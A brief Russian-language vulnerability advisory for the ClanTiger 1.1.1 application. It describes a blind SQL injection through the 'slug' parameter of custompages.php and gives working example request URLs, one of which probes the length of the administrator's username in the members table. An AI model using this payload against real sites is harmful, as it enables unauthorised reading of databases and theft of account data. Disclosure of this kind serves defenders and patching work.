Программа: ClanTiger 1.1.1

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «slug» сценарием custompages.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

[HOME_PATH]/modules/custompages.php?slug=the_custom_page’ [BLIND SQL
INJECTION]

[HOME_PATH]/modules/custompages.php?slug=the_custom_page’%20AND%20((SELECT%20length(username)%20from%20members%20WHERE%20id=1)=5)%20/*



Оставить мнение